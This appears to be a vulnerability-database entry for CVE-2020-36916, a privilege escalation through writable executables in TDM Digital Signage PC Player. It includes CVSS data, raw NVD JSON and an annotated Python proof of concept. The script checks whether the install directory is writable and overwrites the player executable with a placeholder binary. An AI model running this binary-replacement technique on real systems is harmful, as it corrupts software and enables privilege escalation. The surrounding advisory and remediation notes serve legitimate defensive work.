Security Vulnerability Report
CVE-2020-36916 CVSS 8.8 HIGH

CVE-2020-36916

Published: 2026-01-06 16:15:48
Last Modified: 2026-04-15 00:35:42

Description

TDM Digital Signage PC Player 4.1.0.4 contains an elevation of privileges vulnerability that allows authenticated users to modify executable files. Attackers can leverage the 'Modify' permissions for authenticated users to replace executable files with malicious binaries and gain elevated system access.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
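CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Note: the raw record below also carries a CVSS 4.0 vector for this CVE that rates the attack vector as LOCAL (base score 8.5), whereas the 3.1 vector above rates it as NETWORK. The listed weakness is CWE-732 (incorrect permission assignment), so read the two scores together when prioritising.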

Configurations (Affected Products)

No configuration data available.

TDM Digital Signage PC Player <= 4.1.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
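#!/usr/bin/env python3
# CVE-2020-36916 PoC - TDM Digital Signage PC Player Privilege Escalation
# Author: Security Research Team
# Note: This is for educational and authorized testing purposes only
#
# Reviewer notes:
# - Root cause per the CVE record is CWE-732: authenticated users hold
#   'Modify' rights on the product's executable files. Remediation is to
#   remove that right from the install directory and its files, then verify
#   the installed binaries against known-good copies.
# - The install path and executable name below are hard-coded by this
#   listing; the advisory text does not state them. Confirm them against
#   the real installation before trusting any result.
# - Artefacts this script leaves or touches, useful for detection: a
#   "<exe>.bak" file next to the player binary, a short-lived
#   "malicious.exe" in the install directory, and a changed hash on the
#   executable itself.

import os
import sys
import shutil
import subprocess


def check_vulnerability():
    """Report whether the hard-coded install directory exists and looks writable.

    Returns:
        A ``(writable, target_dir, executable)`` tuple. ``writable`` is True
        only when the directory exists and ``os.access`` reports write access.
        The two paths are returned in every case.
    """
    target_dir = r"C:\Program Files\TDM Digital Signage"
    executable = os.path.join(target_dir, "PlayerSetup.exe")

    if not os.path.exists(target_dir):
        print("[-] Target directory not found")
        return False, target_dir, executable

    print(f"[+] Target directory found: {target_dir}")

    # NOTE(review): on Windows os.access() is derived from file attributes,
    # not from the NTFS ACL, so a True result here can be a false positive.
    # Treat the verdict as a hint and confirm by reading the directory ACL
    # (for example with icacls) for a Modify entry granted to Authenticated
    # Users. This check also never looks at the executable itself.
    if os.access(target_dir, os.W_OK):
        print("[+] Directory is writable - VULNERABLE")
        return True, target_dir, executable

    print("[-] Directory is not writable")
    return False, target_dir, executable


def create_malicious_executable(output_path):
    """Write the demonstration stand-in file to *output_path*.

    The bytes written are the two-byte "MZ" magic followed by 100 zero bytes.
    That is a marker, not a loadable program: it has no PE header and carries
    no payload.

    Args:
        output_path: Destination file path; an existing file is overwritten.

    Returns:
        True when the file was written, False when writing raised.
    """
    # Placeholder only: "MZ" plus zero padding is not a valid PE image.
    malicious_code = b'MZ' + b'\x00' * 100

    try:
        with open(output_path, 'wb') as f:
            f.write(malicious_code)
    except Exception as e:
        print(f"[-] Failed to create malicious executable: {e}")
        return False

    print(f"[+] Malicious executable created: {output_path}")
    return True


def exploit(target_dir, original_exe):
    """Overwrite *original_exe* with the placeholder file, keeping a backup.

    Steps: copy the original to ``original_exe + ".bak"``, write the
    placeholder to ``malicious.exe`` inside *target_dir*, copy it over the
    original, then delete the staged file. The backup is left in place and
    nothing restores it automatically; restoring the original after a test
    is a manual step.

    Args:
        target_dir: Directory in which the placeholder is staged.
        original_exe: Path of the executable that gets overwritten.

    Returns:
        True when the replacement completed, False when the backup, staging
        or replacement step failed. A failed cleanup is reported but does
        not change the return value.
    """
    backup_path = original_exe + ".bak"
    malicious_path = os.path.join(target_dir, "malicious.exe")

    print("[*] Step 1: Backing up original executable...")
    try:
        shutil.copy2(original_exe, backup_path)
    except Exception as e:
        print(f"[-] Backup failed: {e}")
        return False
    print(f"[+] Backup created: {backup_path}")

    print("[*] Step 2: Creating malicious executable...")
    if not create_malicious_executable(malicious_path):
        return False

    print("[*] Step 3: Replacing original executable...")
    try:
        shutil.copy2(malicious_path, original_exe)
    except Exception as e:
        print(f"[-] Replacement failed: {e}")
        return False
    print("[+] Original executable replaced")

    print("[*] Step 4: Cleaning up artifacts...")
    try:
        os.remove(malicious_path)
    except OSError as e:
        # Was a bare "except: pass", which also swallowed KeyboardInterrupt
        # and hid a leftover staged file from whoever has to tidy up the
        # test host afterwards.
        print(f"[-] Cleanup failed: {e}")
    else:
        print("[+] Cleanup complete")

    # NOTE(review): the message below overstates what happened. Only the
    # non-executable placeholder was written, and the privilege level at
    # which the player binary is later launched is not shown by this listing.
    print("[!] Exploit complete - malicious code will execute with SYSTEM privileges")
    return True


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2020-36916 Privilege Escalation PoC")
    print("Target: TDM Digital Signage PC Player")
    print("=" * 60)

    vulnerable, target, exe = check_vulnerability()

    if vulnerable:
        print("\n[*] Target is VULNERABLE to CVE-2020-36916")
        response = input("Proceed with exploit? (y/N): ")
        if response.lower() == 'y':
            exploit(target, exe)
    else:
        print("\n[-] Target is NOT vulnerable or not found")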

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36916", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:47.733", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "TDM Digital Signage PC Player 4.1.0.4 contains an elevation of privileges vulnerability that allows authenticated users to modify executable files. Attackers can leverage the 'Modify' permissions for authenticated users to replace executable files with malicious binaries and gain elevated system access."}, {"lang": "es", "value": "TDM Digital Signage PC Player 4.1.0.4 contiene una vulnerabilidad de elevación de privilegios que permite a usuarios autenticados modificar archivos ejecutables. Los atacantes pueden aprovechar los permisos de 'Modificar' para usuarios autenticados para reemplazar archivos ejecutables con binarios maliciosos y obtener acceso elevado al sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/190627", "source": "[email protected]"}, {"url": "https://packetstorm.news/files/id/159723", "source": "[email protected]"}, {"url": "https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48953", "source": "[email protected]"}, {"url": "https://www.tdmsignage.com", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/tdm-digital-signage-pc-player-privilege-escalation-via-insecure-permissions", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5604.php", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48953", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}